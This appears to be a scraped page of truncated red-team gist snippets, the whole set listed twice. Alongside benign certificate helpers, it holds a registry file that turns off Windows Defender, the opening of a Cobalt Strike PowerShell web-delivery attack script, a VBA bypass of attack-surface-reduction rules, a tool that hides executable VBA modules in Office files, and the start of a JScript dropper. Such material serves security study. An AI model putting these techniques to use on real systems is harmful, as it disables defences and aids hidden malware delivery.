TechByTom

## getCerts
#!/bin/bash
if [ $# -eq 0 ]
then
   echo "Usage: getCSCert.sh yourdomainhere.com"
   exit 1
fi
MyDomain="`echo "$1" | tr '[:upper:]' '[:lower:]'`"
sudo service nginx stop
read -p "Add this server to your public port 80 security group, then press any key to continue..."
sudo certbot certonly --standalone --preferred-challenges http -d $MyDomain

## stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.

## Disable Windows Defender
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableBehaviorMonitoring"=dword:00000001
"DisableOnAccessProtection"=dword:00000001
"DisableScanOnRealtimeEnable"=dword:00000001

## ironregistry.py
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 Im mr meeseeks',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')

## ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

## Invoke-HideVBAModule.psm1
<#
 .Synopsis
  Used to hide VBA modules from the VBA editor in Microsoft Office documents/templates, but still have them contain executable code.
  Script created by William Knowles. @william_knows
  Technique originally found by Thegrideon Software: https://www.thegrideon.com/vba-internals.html

 .Description
  This cmdlet facilitates editing the Word/Excel documents/templates to remove references to VBA modules.
  For the older compatibility formats you can edit the file directly with a hex editor and remove module references.
  For the newer XML formats that use zip files, you need to unzip them, and edit the vbaProject.bin file.

## gist:9b95499c0511418383d8ab651018b85f
https://ip-ranges.amazonaws.com/ip-ranges.json

## get_certs.sh
#!/bin/bash
# Add these functions to your .bashrc or .zshrc and use from your terminal.

get_certs_domains() {
  	# Credit goes to Ronnie Flathers, taken from https://twitter.com/ropnop/status/972151279463124994
	curl -s https://crt.sh\?q\=%25.$1 | awk -v pattern="<TD>.*$1" '$0 ~ pattern {gsub("<[^>]*>","");gsub(//,""); print}' | sort -u
}
get_certs() {
	curl -s https://crt.sh\?q\=%25.$1 | awk '/\?id=[0-9]*/{nr[NR]; nr[NR+1]; nr[NR+3]; nr[NR+4]}; NR in nr' | sed 's/<TD style="text-align:center"><A href="?id=//g' | sed 's#">[0-9]*</A></TD>##g' | sed 's#<TD style="text-align:center">##g' | sed 's#</TD>##g' | sed 's#<TD>##g' | sed 's#<A style=["a-z: ?=0-9-]*>##g' | sed 's#</A>##g' | sed 'N;N;N;s/\n/\t\t/g'
}

## Tasks.cs
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

/*

## dynwrapx.js
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/


var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> 	<file name="dynwrapx.dll">     	<comClass         	description="DynamicWrapperX Class"         	clsid="{89565276-A714-4a43-912E-978B935EDCCC}"         	threadingModel="Both"         	progid="DynamicWrapperX"/> 	</file>  </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);

// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac
	#!/bin/bash
	if [ $# -eq 0 ]
	then
	echo "Usage: getCSCert.sh yourdomainhere.com"
	exit 1
	fi
	MyDomain="`echo "$1" \| tr '[:upper:]' '[:lower:]'`"
	sudo service nginx stop
	read -p "Add this server to your public port 80 security group, then press any key to continue..."
	sudo certbot certonly --standalone --preferred-challenges http -d $MyDomain
	# Scripted Web Delivery (Stageless)
	#
	# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

	# setup our stageless PowerShell Web Delivery attack
	sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.
	Windows Registry Editor Version 5.00

	[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
	"DisableAntiSpyware"=dword:00000001

	[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
	"DisableBehaviorMonitoring"=dword:00000001
	"DisableOnAccessProtection"=dword:00000001
	"DisableScanOnRealtimeEnable"=dword:00000001
	from Microsoft.Win32 import Registry
	from time import sleep
	rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
	rkey.SetValue(u'\x00 Im mr meeseeks',u'\x00look at me!')
	rkey.Close()
	rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
	values = rkey.GetValueNames()
	print("We have {0} values.".format(str(len(values))))
	print("The value names returned are: {0}.".format(values[0]))
	value = rkey.GetValue(u'\x00 this is a test')
	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub
	<#
	.Synopsis
	Used to hide VBA modules from the VBA editor in Microsoft Office documents/templates, but still have them contain executable code.
	Script created by William Knowles. @william_knows
	Technique originally found by Thegrideon Software: https://www.thegrideon.com/vba-internals.html

	.Description
	This cmdlet facilitates editing the Word/Excel documents/templates to remove references to VBA modules.
	For the older compatibility formats you can edit the file directly with a hex editor and remove module references.
	For the newer XML formats that use zip files, you need to unzip them, and edit the vbaProject.bin file.
	#!/bin/bash
	# Add these functions to your .bashrc or .zshrc and use from your terminal.

	get_certs_domains() {
	# Credit goes to Ronnie Flathers, taken from https://twitter.com/ropnop/status/972151279463124994
	curl -s https://crt.sh\?q\=%25.$1 \| awk -v pattern="<TD>.$1" '$0 ~ pattern {gsub("<[^>]>","");gsub(//,""); print}' \| sort -u
	}
	get_certs() {
	curl -s https://crt.sh\?q\=%25.$1 \| awk '/\?id=[0-9]/{nr[NR]; nr[NR+1]; nr[NR+3]; nr[NR+4]}; NR in nr' \| sed 's/<TD style="text-align:center"><A href="?id=//g' \| sed 's#">[0-9]</A></TD>##g' \| sed 's#<TD style="text-align:center">##g' \| sed 's#</TD>##g' \| sed 's#<TD>##g' \| sed 's#<A style=["a-z: ?=0-9-]*>##g' \| sed 's#</A>##g' \| sed 'N;N;N;s/\n/\t\t/g'
	}
	using System;
	using System.IO;
	using System.Text;
	using System.IO.Compression;
	using System.EnterpriseServices;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;
	using System.Security.Cryptography;

	/*
	//Example Reference:
	// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/


	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
	var fso = new ActiveXObject("Scripting.FileSystemObject");
	var dropPath = fso.GetSpecialFolder(2);

	// Create Base64 Object, supports encode, decode
	var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e\|\|0)>>2&63,A=(3&e)<<4\|(t=t\|\|0)>>4&15,o=(15&t)<<2\|(h=h\|\|0)>>6&3,B=63&h;t?h\|\|(B=64):o=B=64,r+=Base64.charac